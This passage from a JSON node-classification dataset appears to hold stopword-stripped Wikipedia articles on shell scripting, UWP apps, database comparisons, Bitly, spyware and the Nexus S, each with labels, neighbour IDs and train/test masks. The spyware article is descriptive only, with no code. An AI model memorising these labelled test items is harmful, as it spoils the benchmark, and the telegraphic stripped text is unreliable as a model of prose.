compatibility problems different platforms larry wall creator perl famously wrote easier port shell shell script similarly complex scripts run limitations shell scripting language limits make difficult write quality code extensions various shells ameliorate problems original shell language make problems worse many disadvantages using script languages caused design flaws within language syntax implementation necessarily imposed use text-based command-line number shells use shell programming languages even full-fledged languages like scsh uses scheme interoperability software cygwin mks toolkit interix available microsoft windows services unix hamilton c shell uwin unix windows others allow unix shell programs run machines running windows nt successors loss functionality ms-dos-windows 95 branch well earlier mks toolkit versions os/2 least three dcl implementations windows type operating systems—in addition xlnt multiple-use scripting language package used command shell windows script host cgi programming—are available systems well mac os x subsequent unix-like well addition aforementioned tools posix os/2 functionality used corresponding environmental subsystems windows nt operating system series windows 2000 well third 16-bit subsystem often called ms-dos subsystem uses command.com provided operating systems run aforementioned ms-dos batch files console alternatives 4dos 4os2 freedos peter norton ndos 4nt take command add functionality windows nt-style cmd.exe ms-dos/windows 95 batch files run command.com os/2 cmd.exe 4nt respectively similar shells enhance integrated windows script host comes three pre-installed engines vbscript jscript vba numerous third-party engines added rexx perl python ruby tcl pre-defined functions 4nt related programs pc dos quite similar ms-dos whilst dr dos different earlier versions windows nt able run contemporary versions 4os2 os/2 subsystem scripting languages definition able extended example ms-dos/windows 95/98 windows nt type systems allows shell/batch programs call tools like kixtart qbasic various basic rexx perl python implementations windows script host installed engines unix posix-compliant systems awk sed used extend string numeric processing ability shell scripts tcl perl rexx python graphics toolkits used code functions procedures shell scripts pose speed bottleneck c fortran assembly language c much faster still add functionality available shell language sockets connectivity functions heavy-duty text processing working numbers calling script abilities self-writing self-modifying code techniques like recursion direct memory access various types sorting difficult impossible main script visual basic applications vbscript used control communicate things spreadsheets databases scriptable programs types telecommunications software development tools graphics tools software accessed component object model",
    "neighbors": [
      512,
      9733,
      9735,
      3594,
      9747,
      9245,
      5677,
      9780,
      6718,
      8262,
      4684,
      6228,
      603,
      5723,
      10341,
      1130,
      621,
      9330,
      3705,
      7292,
      9345,
      2693,
      9871,
      3221,
      2198,
      7318,
      9882,
      7326,
      4775,
      7847,
      4777,
      6313,
      10920,
      8879,
      7857,
      11442,
      1203,
      692,
      4277,
      6335,
      9926,
      5833,
      4814,
      7889,
      7384,
      9946,
      3804,
      6877,
      228,
      10470,
      5357,
      10991,
      11506,
      9972,
      1273,
      11001,
      260,
      11525,
      4870,
      10506,
      3856,
      8976,
      2322,
      7444,
      11033,
      9507,
      292,
      3876,
      4900,
      295,
      4398,
      823,
      7486,
      10564,
      8522,
      8523,
      8524,
      11596,
      847,
      2903,
      6498,
      10083,
      8549,
      6502,
      4968,
      11112,
      8554,
      7534,
      11632,
      5492,
      3960,
      6016,
      8065,
      3462,
      8582,
      8082,
      1435,
      413,
      11683,
      7076,
      8612,
      10149,
      428,
      2485,
      6583,
      4024,
      6074,
      10177,
      8644,
      6092,
      9166,
      11219,
      2519,
      10200,
      477,
      5096,
      6120,
      7147,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10388,
    "label": 2,
    "text": "Universal_Windows_Platform_apps:universal windows platform apps universal windows platforms uwp apps formerly windows store apps metro-style apps applications used across compatible microsoft windows devices including personal computers pcs tablets smartphones xbox one microsoft hololens internet things uwp software primarily purchased downloaded via microsoft store starting windows 10 windows uses windows app refer uwp apps app installed microsoft store formerly windows store trusted windows store app computer programs running desktop computer desktop apps terms universal windows platform uwp uwp app appear microsoft documentation developers microsoft started retrospectively use windows runtime app refer precursors uwp app unambiguous name windows software first became available name metro-style apps windows store opened 2012 marketed windows 8 windows 8.x metro-style apps run window instead either occupy entire screen snapped one side case occupy entire height screen part width title bar system menu window borders control buttons command interfaces like scroll bars usually hidden first menus located settings charm metro-style apps use ui controls windows 8.x typically follow windows 8.x ui guidelines horizontal scrolling inclusion edge-uis like app bar response criticism customers windows 8.1 title bar present hidden unless users move mouse cursor top screen hamburger menu button title bar gives access charms users point entry metro-style apps windows store enterprises operating windows domain infrastructure may enter contract microsoft allows sideload line-of-business metro-style apps circumventing windows store also major web browser vendors google mozilla foundation selectively exempted rule allowed circumvent microsoft guidelines windows store run metro-style version user chooses make product default web browser metro-style apps third-party apps run windows rt traditional third-party apps run operating system windows 8 computer programs identified static computer icons windows taskbar responsible representing every app window run metro-style apps however identified tiles show icon also dynamic contents addition windows 8 windows 8.1 rtm shown windows taskbar run dedicated app switcher left side screen windows 8.1 update restored taskbar icons metro-style apps set limit many copies desktop apps run simultaneously example one user may run many copies programs notepad paint firefox system resources support desktop apps windows media player designed allow single instance enforced operating system however windows 8 one copy metro-style apps may run given time invoking app brings running instance front true multi-instancing apps available windows 10 version 1803 released may 2018 windows 10 brings significant changes uwp apps look work uwp apps look depends app uwp apps built specifically windows 10 typically distinct look feel use new ui controls look different previous versions windows exception apps use custom ui especially case video games apps designed windows 8.x look significantly different designed windows 10 uwp apps also look almost identical traditional desktop apps using legacy ui controls windows versions dating back windows 95 legacy desktop apps converted uwp apps distributed using appx file format windows 10 uwp apps even designed windows 8.x run floating windows users use windows taskbar task view switch uwp apps desktop apps windows 10 also introduced continuum tablet mode mode default disabled desktop computers enabled tablet computers desktop users switch manually tablet mode apps may resizable windows visible title bars tablet mode enabled resizable apps use windowing system similar metro-style apps windows 8.x forced either occupy whole screen snapped one side uwp apps windows 10 open multiple windows microsoft edge calculator photos examples apps allow windows 10 v1803 released may 2018 added true multi-instancing capabilities multiple independent copies uwp app run uwp apps downloaded windows store sideloaded another device sideloading requirements reduced significantly windows 8.x 10 app must still signed trusted digital certificate chains root certificate metro-style apps suspended closed suspended apps terminated automatically needed windows app manager dynamic tiles background components contracts interfaces interacting apps may require app activated user starts six years invoking arbitrary metro-style app uwp app command line supported feature first introduced insider build 16226 windows 10 released 21 june 2017 traditionally windows software developed using windows api software access api arbitrary restrictions developers free choose programming language development tools metro-style apps however developed using windows runtime winrt calling forbidden api disqualifies app appearing windows store every app using winrt metro-style app limited subset winrt available desktop apps metro-style apps developed using microsoft development tools according allen bauer chief scientist embarcadero technologies apis every computer program must call microsoft forbidden except call comes microsoft visual c++ runtime apps developed work intrinsically smartphones personal computers video game consoles hololens called universal apps accomplished using universal app api first introduced windows 8.1 windows phone 8.1 visual studio 2013 update 2 could used develop apps windows 10 introduced universal windows platform uwp 10 developing universal apps apps take advantage platform developed visual studio 2015 later older metro-style apps windows 8.1 windows phone 8.1 universal 8.1 need modifications migrate platform uwp distinct windows runtime rather extension universal apps longer indicate written specific os manifest instead target one device families e.g desktop mobile xbox internet things iot react capabilities become available device universal app may run small mobile phone tablet provide suitable experience universal app running mobile phone may start behaving way would tablet phone connected monitor suitable docking station appx file format used distribute install apps windows 8.x 10 windows phone 8.1 windows 10 mobile xbox one hololens windows 10 iot core unlike legacy desktop apps appx installation system allowed uwp apps replaces xap file format windows phone 8.1 attempt unify distribution apps windows phone windows 8 appx files compatible windows phone 8.1 later versions windows 8 later versions windows phone 8.x marketplace allows users download appx files sd card install manually contrast sideloading prohibited windows 8.x unless user developers license business domain traditionally windows software power use change ecosystem however wanted windows user account rights user account control antivirus software attempt keep ability check notify user app tries use malicious purposes metro-style apps however sandboxed permanently change windows ecosystem need permission access hardware devices webcam microphone file system access restricted user folders documents microsoft moderates programs may remove windows store discovered security privacy issues",
    "neighbors": [
      6797,
      4624,
      10900,
      537,
      11546,
      11549,
      3102,
      7456,
      9762,
      2213,
      11559,
      1832,
      3881,
      6441,
      430,
      6709,
      1083,
      2749,
      5952,
      8262,
      6088,
      5078,
      9434,
      9694,
      4704,
      8296,
      9448,
      10986,
      364,
      4972,
      7796,
      3573,
      5754,
      510,
      11519
    ],
    "mask": "Test"
  },
  {
    "node_id": 10389,
    "label": 1,
    "text": "Comparison_of_relational_database_management_systems:comparison relational database management systems following tables compare general technical information number relational database management systems please see individual products articles information unless otherwise specified footnotes comparisons based stable versions without add-ons extensions external programs style= width:16em maintainer first public release date latest stable version latest release date license public issues list style= text-align left 4d 4th dimension style= text-align left adabas style= text-align left adaptive server enterprise style= text-align left advantage database server ads style= text-align left altibase style= text-align left apache derby style= text-align left clustrixdb style= text-align left cubrid style= text-align left datacom style= text-align left db2 style= text-align left empress embedded database style= text-align left exasolution style= text-align left filemaker style= text-align left firebird style= text-align left gpudb style= text-align left hsqldb style= text-align left h2 style= text-align left informix dynamic server style= text-align left ingres style= text-align left interbase style= text-align left linter sql rdbms style= text-align left luciddb style= text-align left mariadb style= text-align left maxdb style= text-align left microsoft access jet style= text-align left microsoft visual foxpro style= text-align left microsoft sql server style= text-align left microsoft sql server compact embedded database style= text-align left mimer sql style= text-align left monetdb style= text-align left msql style= text-align left mysql style= text-align left memsql style= text-align left nexusdb style= text-align left hp nonstop sql style= text-align left nuodb style= text-align left omnis studio style= text-align left openbase sql style= text-align left openedge style= text-align left openlink virtuoso style= text-align left oracle db style= text-align left oracle rdb style= text-align left paradox style= text-align left percona server mysql style= text-align left pervasive psql style= text-align left polyhedra dbms style= text-align left postgresql style= text-align left style= text-align left raima database manager style= text-align left rdm server style= text-align left sap hana style= text-align left soliddb style= text-align left sql anywhere style= text-align left sqlbase style= text-align left sqlite style= text-align left sqream db style= text-align left superbase style= text-align left teradata style= text-align left tibero style= text-align left tidb",
    "neighbors": [
      5640,
      8201,
      4106,
      6156,
      10258,
      2068,
      3096,
      1049,
      5658,
      3103,
      9248,
      10793,
      1579,
      10286,
      6709,
      11324,
      9286,
      2632,
      9290,
      8788,
      10326,
      7767,
      4696,
      5210,
      1636,
      9828,
      5734,
      8295,
      8808,
      10340,
      2669,
      6770,
      2168,
      1146,
      6780,
      3196,
      8844,
      6797,
      9360,
      3219,
      5779,
      10389,
      10899,
      11422,
      4255,
      9893,
      2727,
      4263,
      9389,
      10413,
      6831,
      9397,
      7868,
      1215,
      6850,
      2246,
      210,
      2780,
      734,
      10471,
      6383,
      5364,
      7412,
      5879,
      2810,
      3323,
      9471,
      5384,
      8969,
      7946,
      11530,
      270,
      8979,
      7446,
      11030,
      5403,
      9503,
      11552,
      2344,
      10236,
      7983,
      9010,
      6451,
      823,
      1341,
      10048,
      2369,
      5953,
      3400,
      7506,
      2901,
      10069,
      8539,
      863,
      864,
      7523,
      7022,
      5999,
      9075,
      11136,
      7556,
      10632,
      2456,
      9112,
      10137,
      2972,
      1950,
      9631,
      9634,
      1447,
      7080,
      5546,
      3004,
      5573,
      7627,
      2512,
      9687,
      9177,
      987,
      4065,
      8683,
      6124,
      2544,
      10737,
      9205,
      4604
    ],
    "mask": "Test"
  },
  {
    "node_id": 10390,
    "label": 8,
    "text": "Bitly:bitly bitly url shortening service link management platform company bitly inc. established 2008 privately held based new york city bitly shortens 600 million links per month use social networking sms email bitly makes money charging access aggregate data created result many people using shortened urls 2017 spectrum equity acquired majority stake bitly 64 million august 2018 bitly shortened 37.5 billion urls bitly url shortening service became popular twitter became default url shortening service website may 6 2009 subsequently replaced twitter t.co service company behind bitly launched similar service online videos determine videos popular web company offers paid solution called bitly enterprise provides advanced branding features audience intel omnichannel campaign tracking companies use custom domains generate shortened links example new york times uses codice_1 pepsi uses codice_2 allows company push brand awareness services twitter use bitly engine generate shortened urls track marketing metrics bitly enterprise also advanced analytics features uses bitly data provide advanced social insight tools companies brands company uses http 301 redirects links shortcuts intended permanent changed created urls shortened bitly service use codice_3 domain generic domain service offers information short bitly url codice_4 available codice_5 url plus sign appended example codice_6 allows users see check long url visiting starting october 12 2010 users could automatically generate qr codes scanned mobile qr code reader automatically directed users shortened links later removed may 29 2012 bitly announced bitmarks new search feature enhanced public profiles iphone app codice_7 country code top-level domain cctld libya 2011 bit.ly address set redirect bitly.com .ly tld controlled libyan government previously removed one domain deemed incompatible muslim law shortened url generated bitly also accessed replacing domain one following",
    "neighbors": [
      7370,
      1643,
      9039,
      5012,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 10391,
    "label": 9,
    "text": "Little_Implementation_Language:little implementation language lil little implementation language system programming language early days unix history pdp-11 machines written p. j. plauger bell labs lil attempted fill gap assemblers machine-independent system implementation languages c programming language basically adding structured programming pdp-11 assembly language lil resembled pl360 c-like flow control syntax lil compiler lc part fifth edition unix 1974 dropped sixth edition unix 1975 plauger left bell labs year plauger explains lil abandoned bell labs favor c",
    "neighbors": [
      3488,
      5492
    ],
    "mask": "Test"
  },
  {
    "node_id": 10392,
    "label": 4,
    "text": "Spyware:spyware spyware software aims gather information person organization sometimes without knowledge may send information another entity without consumer consent asserts control device without consumer knowledge may send information another entity consumer consent cookies spyware mostly classified four types adware system monitors tracking cookies trojans examples notorious types include digital rights management capabilities phone home keyloggers rootkits web beacons spyware mostly used stealing information storing internet users movements web serving pop-up ads internet users whenever spyware used malicious purposes presence typically hidden user difficult detect spyware keyloggers may installed owner shared corporate public computer intentionally order monitor users term spyware suggests software monitors user computing functions spyware extend beyond simple monitoring spyware collect almost type data including personal information like internet surfing habits user logins bank credit account information spyware also interfere user control computer installing additional software redirecting web browsers spyware change computer settings result slow internet connection speeds un-authorized changes browser settings changes software settings sometimes spyware included along genuine software may come malicious website may added intentional functionality genuine software see paragraph facebook response emergence spyware small industry sprung dealing anti-spyware software running anti-spyware software become widely recognized element computer security practices especially computers running microsoft windows number jurisdictions passed anti-spyware laws usually target software surreptitiously installed control user computer german-speaking countries spyware used made government called govware computer experts common parlance regierungstrojaner literally government trojan govware typically trojan horse software used intercept communications target computer countries like switzerland germany legal framework governing use software us term policeware used similar purposes use term spyware eventually declined practice tracking users pushed ever mainstream major websites data mining companies generally break known laws compel users tracked fraudulent practices per se default settings created users language terms-of-service agreements one documented example cbs/cnet news reported march 7 2011 wall street journal analysis revealing practice facebook websites tracking users browsing activity linked identity far beyond users visits activity within facebook site report stated works go facebook log spend time ... move without logging let say next site go new york times buttons without clicking reported back facebook twitter went also identity within accounts let say moved something like site depression one also tweet button google widget report back went wsj analysis researched brian kennish founder disconnect inc. spyware necessarily spread way virus worm infected systems generally attempt transmit copy software computers instead spyware installs system deceiving user exploiting software vulnerabilities spyware installed without knowledge using deceptive tactics spyware may try deceive users bundling desirable software common tactics using trojan horse spy gadgets look like normal devices turn something else usb keylogger devices actually connected device memory units capable recording stroke made keyboard spyware authors infect system security holes web browser software user navigates web page controlled spyware author page contains code attacks browser forces download installation spyware installation spyware frequently involves internet explorer popularity history security issues made frequent target deep integration windows environment make susceptible attack windows operating system internet explorer also serves point attachment spyware form browser helper objects modify browser behavior spyware rarely operates alone computer affected machine usually multiple infections users frequently notice unwanted behavior degradation system performance spyware infestation create significant unwanted cpu activity disk usage network traffic stability issues applications freezing failure boot system-wide crashes also common spyware interferes networking software commonly causes difficulty connecting internet infections spyware even evident users assume situations performance issues relate faulty hardware windows installation problems another malware infection owners badly infected systems resort contacting technical support experts even buying new computer existing system become slow badly infected systems may require clean reinstallation software order return full functionality moreover types spyware disable software firewalls antivirus software and/or reduce browser security settings opens system opportunistic infections spyware disables even removes competing spyware programs grounds spyware-related annoyances increase likelihood users take action remove programs keyloggers sometimes part malware packages downloaded onto computers without owners knowledge keylogger software freely available internet others commercial private applications keyloggers allow keyboard keystrokes captured also often capable collecting screen captures computer typical windows user administrative privileges mostly convenience program user runs unrestricted access system operating systems windows users able follow principle least privilege use non-administrator accounts alternatively reduce privileges specific vulnerable internet-facing processes internet explorer since windows vista default computer administrator runs everything limited user privileges program requires administrative privileges user account control pop-up prompt user allow deny action improves design used previous versions windows spyware threat evolved number techniques emerged counteract include programs designed remove block spyware well various user practices reduce chance getting spyware system nonetheless spyware remains costly problem large number pieces spyware infected windows computer remedy may involve backing user data fully reinstalling operating system instance spyware completely removed symantec microsoft pc tools many programmers commercial firms released products dedicated remove block spyware programs pc tools spyware doctor lavasoft ad-aware se patrick kolla spybot search destroy rapidly gained popularity tools remove cases intercept spyware programs december 16 2004 microsoft acquired giant antispyware software rebranding windows antispyware beta releasing free download genuine windows xp windows 2003 users 2006 renamed windows defender major anti-virus firms symantec pc tools mcafee sophos also added anti-spyware features existing anti-virus products early anti-virus firms expressed reluctance add anti-spyware functions citing lawsuits brought spyware authors authors web sites programs described products spyware however recent versions major firms home business anti-virus products include anti-spyware functions albeit treated differently viruses symantec anti-virus instance categorizes spyware programs extended threats offers real-time protection threats anti-spyware programs combat spyware two ways programs inspect contents windows registry operating system files installed programs remove files entries match list known spyware real-time protection spyware works identically real-time anti-virus protection software scans disk files download time blocks activity components known represent spyware cases may also intercept attempts install start-up items modify browser settings earlier versions anti-spyware programs focused chiefly detection removal javacool software spywareblaster one first offer real-time protection blocked installation activex-based spyware like anti-virus software many anti-spyware/adware tools require frequently updated database threats new spyware programs released anti-spyware developers discover evaluate adding list known spyware allows software detect remove new spyware result anti-spyware software limited usefulness without regular updates updates may installed automatically manually popular generic spyware removal tool used requires certain degree expertise hijackthis scans certain areas windows os spyware often resides presents list items delete manually items legitimate windows files/registry entries advised less knowledgeable subject post hijackthis log numerous antispyware sites let experts decide delete spyware program blocked manages get installed may resist attempts terminate uninstall programs work pairs anti-spyware scanner user terminates one running process one respawns killed program likewise spyware detect attempts remove registry keys immediately add usually booting infected computer safe mode allows anti-spyware program better chance removing persistent spyware killing process tree may also work detect spyware computer users found several practices useful addition installing anti-spyware programs many users installed web browser internet explorer mozilla firefox google chrome though browser completely safe internet explorer greater risk spyware infection due large user base well vulnerabilities activex three major browsers close equivalent comes security isps—particularly colleges universities—have taken different approach blocking spyware use network firewalls web proxies block access web sites known install spyware march 31 2005 cornell university information technology department released report detailing behavior one particular piece proxy-based spyware marketscore steps university took intercept many educational institutions taken similar steps individual users also install firewalls variety companies monitor flow information going networked computer provide protection spyware malware users install large hosts file prevents user computer connecting known spyware-related web addresses spyware may get installed via certain shareware programs offered download downloading programs reputable sources provide protection source attack individual users use cellphone computer physical electric switch isolated electronic switch disconnects microphone camera without bypass keep disconnected position use limits information spyware collect policy recommended nist guidelines managing security mobile devices 2013 spyware vendors notably 180 solutions written new york times dubbed stealware spyware researcher ben edelman terms affiliate fraud form click fraud stealware diverts payment affiliate marketing revenues legitimate affiliate spyware vendor spyware attacks affiliate networks places spyware operator affiliate tag user activity – replacing tag one spyware operator party gains user choices thwarted legitimate affiliate loses revenue networks reputations injured vendors harmed pay affiliate revenues affiliate party contract affiliate fraud violation terms service affiliate marketing networks result spyware operators 180 solutions terminated affiliate networks including linkshare sharesale mobile devices also vulnerable chargeware manipulates users illegitimate mobile charges one case spyware closely associated identity theft august 2005 researchers security software firm sunbelt software suspected creators common coolwebsearch spyware used transmit chat sessions user names passwords bank information etc however turned actually sophisticated criminal little trojan independent cws case currently investigation fbi federal trade commission estimates 27.3 million americans victims identity theft financial losses identity theft totaled nearly 48 billion businesses financial institutions least 5 billion out-of-pocket expenses individuals copy-protection technologies borrowed spyware 2005 sony bmg music entertainment found using rootkits xcp digital rights management technology like spyware difficult detect uninstall poorly written efforts remove could rendered computers unable function texas attorney general greg abbott filed suit three separate class-action suits filed sony bmg later provided workaround website help users remove beginning april 25 2006 microsoft windows genuine advantage notifications application installed windows pcs critical security update main purpose deliberately uninstallable application ensure copy windows machine lawfully purchased installed also installs software accused phoning home daily basis like spyware removed removewga tool spyware used monitor electronic activities partners intimate relationships least one software package loverspy specifically marketed purpose depending local laws regarding communal/marital property observing partner online activity without consent may illegal author loverspy several users product indicted california 2005 charges wiretapping various computer crimes anti-spyware programs often report web advertisers http cookies small text files track browsing activity spyware always inherently malicious many users object third parties using space personal computers business purposes many anti-spyware programs offer remove common spyware programs illustrate diversity behaviors found attacks note computer viruses researchers give names spyware programs may used creators programs may grouped families based shared program code common behaviors following money apparent financial business connections instance number spyware programs distributed claria collectively known gator likewise programs frequently installed together may described parts spyware package even function separately first recorded use term spyware occurred october 16 1995 usenet post poked fun microsoft business model spyware first denoted software meant espionage purposes however early 2000 founder zone labs gregor freund used term press release zonealarm personal firewall later 2000 parent using zonealarm alerted fact reader rabbit educational software marketed children mattel toy company surreptitiously sending data back mattel since spyware taken present sense according 2005 study aol national cyber-security alliance 61 percent surveyed users computers infected form spyware 92 percent surveyed users spyware reported know presence 91 percent reported given permission installation spyware spyware become one preeminent security threats computer systems running microsoft windows operating systems computers internet explorer ie primary browser particularly vulnerable attacks ie widely used tight integration windows allows spyware access crucial parts operating system internet explorer 6 sp2 released part windows xp service pack 2 browser would automatically display installation window activex component website wanted install combination user ignorance changes assumption internet explorer activex components benign helped spread spyware significantly many spyware components would also make use exploits javascript internet explorer windows install without user knowledge permission windows registry contains multiple sections modification key values allows software executed automatically operating system boots spyware exploit design circumvent attempts removal spyware typically link location registry allows execution running spyware periodically check links removed automatically restored ensures spyware execute operating system booted even registry links removed malicious programmers released large number rogue fake anti-spyware programs widely distributed web banner ads warn users computers infected spyware directing purchase programs actually remove spyware—or else may add spyware proliferation fake spoofed antivirus products bill antispyware troublesome users may receive popups prompting install protect computer fact add spyware software called rogue software recommended users install freeware claiming anti-spyware unless verified legitimate known offenders include fake antivirus products constitute 15 percent malware january 26 2006 microsoft washington state attorney general filed suit secure computer spyware cleaner product unauthorized access computer illegal computer crime laws u.s. computer fraud abuse act u.k. computer misuse act similar laws countries since owners computers infected spyware generally claim never authorized installation prima facie reading would suggest promulgation spyware would count criminal act law enforcement often pursued authors malware particularly viruses however spyware developers prosecuted many operate openly strictly legitimate businesses though faced lawsuits spyware producers argue contrary users claims users fact give consent installations spyware comes bundled shareware applications may described legalese text end-user license agreement eula many users habitually ignore purported contracts spyware companies claria say demonstrate users consented despite ubiquity eulas agreements single click taken consent entire text relatively little caselaw resulted use established common law jurisdictions type agreement binding contract certain circumstances however mean every agreement contract every term one enforceable jurisdictions including u.s. states iowa washington passed laws criminalizing forms spyware laws make illegal anyone owner operator computer install software alters web-browser settings monitors keystrokes disables computer-security software united states lawmakers introduced bill 2005 entitled internet spyware prevention act would imprison creators spyware us federal trade commission sued internet marketing organizations unfairness doctrine make stop infecting consumers pcs spyware one case seismic entertainment productions ftc accused defendants developing program seized control pcs nationwide infected spyware malicious software bombarded barrage pop-up advertising seismic clients exposed pcs security risks caused malfunction seismic offered sell victims antispyware program fix computers stop popups problems seismic caused november 21 2006 settlement entered federal court 1.75 million judgment imposed one case 1.86 million another defendants insolvent second case brought cyberspy software llc ftc charged cyberspy marketed sold remotespy keylogger spyware clients would secretly monitor unsuspecting consumers computers according ftc cyberspy touted remotespy 100 undetectable way spy anyone anywhere ftc obtained temporary order prohibiting defendants selling software disconnecting internet servers collect store provide access information software gathered case still preliminary stages complaint filed electronic privacy information center epic brought remotespy software ftc attention administrative fine first kind europe issued independent authority posts telecommunications opta netherlands applied fines total value euro 1,000,000 infecting 22 million computers spyware concerned called dollarrevenue law articles violated art 4.1 decision universal service providers interests end users fines issued based art 15.4 taken together art 15.10 dutch telecommunications law former new york state attorney general former governor new york eliot spitzer pursued spyware companies fraudulent installation software suit brought 2005 spitzer california firm intermix media inc. ended settling agreeing pay us 7.5 million stop distributing spyware hijacking web advertisements also led litigation june 2002 number large web publishers sued claria replacing advertisements settled court courts yet decide whether advertisers held liable spyware displays ads many cases companies whose advertisements appear spyware pop-ups directly business spyware firm rather contracted advertising agency turn contracts online subcontractor gets paid number impressions appearances advertisement major firms dell computer mercedes-benz sacked advertising agencies run ads spyware litigation gone ways since spyware become common pejorative makers filed libel defamation actions products described 2003 gator known claria filed suit website pc pitstop describing program spyware pc pitstop settled agreeing use word spyware continues describe harm caused gator/claria software result anti-spyware anti-virus companies also used terms potentially unwanted programs greyware denote products 2010 webcamgate case plaintiffs charged two suburban philadelphia high schools secretly spied students surreptitiously remotely activating webcams embedded school-issued laptops students using home therefore infringed privacy rights school loaded student computer lanrev remote activation tracking software included now-discontinued thefttrack thefttrack enabled default software program allowed school district elect activate choose thefttrack surveillance options school wanted enable thefttrack allowed school district employees secretly remotely activate webcam embedded student laptop laptop screen allowed school officials secretly take photos webcam whatever front line sight send photos school server lanrev software disabled webcams uses e.g students unable use photo booth video chat students mistakenly believed webcams work addition webcam surveillance thefttrack allowed school officials take screenshots send school server addition lanrev allowed school officials take snapshots instant messages web browsing music playlists written compositions schools admitted secretly snapping 66,000 webshots screenshots including webcam shots students bedrooms",
    "neighbors": [
      3072,
      2049,
      5636,
      6149,
      8197,
      10245,
      8200,
      10756,
      11272,
      5131,
      9227,
      8206,
      9233,
      9746,
      1046,
      6679,
      8726,
      537,
      9242,
      2075,
      10780,
      7710,
      8735,
      9761,
      2084,
      9256,
      9771,
      10283,
      8753,
      11313,
      2611,
      8247,
      10297,
      3643,
      7739,
      3135,
      1088,
      9791,
      4165,
      4677,
      9287,
      9803,
      81,
      4689,
      10323,
      10835,
      8281,
      8797,
      6241,
      10338,
      2151,
      9832,
      107,
      4718,
      10872,
      7289,
      4732,
      5245,
      1662,
      127,
      5246,
      7804,
      6786,
      9346,
      5764,
      9351,
      1163,
      9356,
      6797,
      8333,
      10896,
      10898,
      4245,
      150,
      1690,
      3739,
      156,
      6303,
      2721,
      5281,
      5284,
      2213,
      681,
      2734,
      175,
      4272,
      7855,
      10417,
      700,
      3262,
      10431,
      704,
      8387,
      2244,
      7368,
      5325,
      7886,
      9423,
      10448,
      2257,
      2262,
      6360,
      3290,
      4314,
      8413,
      2783,
      224,
      2275,
      8932,
      6373,
      4843,
      2796,
      10987,
      6382,
      1776,
      7413,
      3320,
      4344,
      2812,
      5373,
      10492,
      1279,
      4863,
      9983,
      5893,
      9488,
      7441,
      8978,
      4883,
      7957,
      278,
      3350,
      4374,
      7449,
      3867,
      4892,
      5404,
      7965,
      3366,
      4903,
      8998,
      7465,
      10026,
      300,
      3887,
      2864,
      5935,
      7983,
      4917,
      6454,
      3394,
      3395,
      839,
      2887,
      4423,
      8526,
      4435,
      8022,
      7515,
      4956,
      9055,
      6496,
      9569,
      11103,
      3941,
      11621,
      9063,
      3944,
      877,
      7024,
      6513,
      3955,
      5491,
      9591,
      9594,
      7547,
      5500,
      4480,
      3969,
      8064,
      899,
      7044,
      3462,
      9607,
      1417,
      5002,
      2443,
      10637,
      9102,
      3473,
      11159,
      7066,
      10141,
      2975,
      8617,
      9129,
      939,
      6059,
      4013,
      9646,
      6576,
      1970,
      4023,
      6588,
      8638,
      4032,
      5057,
      7106,
      3525,
      9160,
      6091,
      2508,
      9168,
      467,
      2005,
      10710,
      7639,
      3032,
      9688,
      3555,
      9187,
      488,
      2027,
      8172,
      11244,
      494,
      6643,
      2041,
      4605,
      2558,
      5631
    ],
    "mask": "None"
  },
  {
    "node_id": 10393,
    "label": 3,
    "text": "Nexus_S:nexus nexus smartphone co-developed google samsung manufactured samsung electronics release 2010 first smartphone use android 2.3 gingerbread operating system first android device support near field communication nfc hardware software fourth time google worked manufacturer produce phone previous google g1 mytouch nexus one three htc following nexus next android developer phone galaxy nexus released following year google current generation nexus phones nexus 6p huawei nexus 5x lg electronics nexus first commercial smartphone certified nasa fly space shuttle used international space station part spheres experiment nexus demonstrated google ceo eric schmidt 15 november 2010 web 2.0 summit google officially announced phone blog 6 december 2010 phone became available purchase 16 december united states 22 december united kingdom super amoled version phone gt-i9020 based samsung galaxy hardware principal hardware differences absence support sd card addition near field chip alternate sc-lcd super clear lcd version phone gt-i9023 meant european non-uk market may 2011 sprint introduced nexus us unlike gsm version sprint nexus runs wimax network uses cdma instead gsm also march 2011 vodafone released white version phone web store uk united kingdom nexus sold carphone warehouse available vodafone o2 t-mobile 3 orange networks france available sfr bouygues telecom india samsung officially announced sale unlocked version super lcd screen i9023 support gsm-based carriers throughout country canada nexus became available carriers april 2011 two versions one telus bell rogers 3g frequencies 850/1900/2100 mhz wind/mobilicity/vidéotron using 3g frequencies 900/1700/2100 australia nexus became available black white available vodafone virtual provider crazy john nexus samsung exynos 3110 processor processor combines 45 nm 1 ghz arm cortex a8 based cpu core powervr sgx 540 gpu cpu core code-named hummingbird co-developed samsung intrinsity gpu designed imagination technologies supports opengl es 1.1/2.0 capable 20 million triangles per second nexus first device use slightly curved glass touchscreen described google contour display super amoled 800 x 480 wvga pentile matrix display manufactured samsung markets outside canada us uk super lcd supplied instead phone shipped android 2.3 gingerbread first device ship updated os 19 december 2011 google released android 4.0 ice cream sandwich nexus s. automatic update suspended allegedly due poor battery performance umts/gsm variants among first receive android 4.0.4 march 2012 nexus 4g aka samsung sph-d720 i9020a m200 taking longer gsm variant received android 4.0.4 update several devices samsung galaxy ii receive updates variants 27 june 2012 google i/o conference announced nexus would one first devices receive upgrade android 4.1 jelly bean along motorola xoom galaxy nexus began 26 july 2012 october 2012 jelly bean 4.1.2 ota update released last official os released devices 13 november 2012 announced nexus would updated android 4.2 jelly bean still supported independent developers though android 4.2.2-based well 4.3- 4.4- 5.1- 6.0-based alternative software installed see nexus sim locked unlockable bootloader allowing users install custom roms joshua topolsky writing engadget review praised devices hardware software concluding truth really best android device available right review register gave nexus 85 rating summarized cool innovative device eye snatch apple ’ smartphone crown anandtech review praised display nfc tag reader android gingerbread operating system noted lack 720p video recording hspa+ baseband external storage support techradar review praised nexus fixing gps problems experienced samsung galaxy good news looking upgrade samsung galaxy – gps issues resolved actually get signal problem cnet review enthusiastic display operating system performance cnet noted lack 720p video recording hdmi output external sd card memory support cnet also noted rather fragile feel phone lack led notifications new features nexus one",
    "neighbors": [
      1537,
      3585,
      9732,
      5637,
      6,
      11271,
      8719,
      3600,
      7700,
      9244,
      11294,
      10271,
      6178,
      1578,
      3626,
      10284,
      5677,
      7727,
      9266,
      1083,
      10303,
      1602,
      6212,
      69,
      8262,
      10820,
      11337,
      4683,
      4685,
      7246,
      11343,
      3664,
      7253,
      8280,
      3162,
      8794,
      8285,
      607,
      2658,
      6763,
      8821,
      6266,
      5755,
      8315,
      8316,
      8829,
      11391,
      1670,
      7816,
      9356,
      5262,
      1682,
      2707,
      10393,
      8858,
      7835,
      6301,
      673,
      8870,
      1191,
      3248,
      7857,
      1203,
      7359,
      1728,
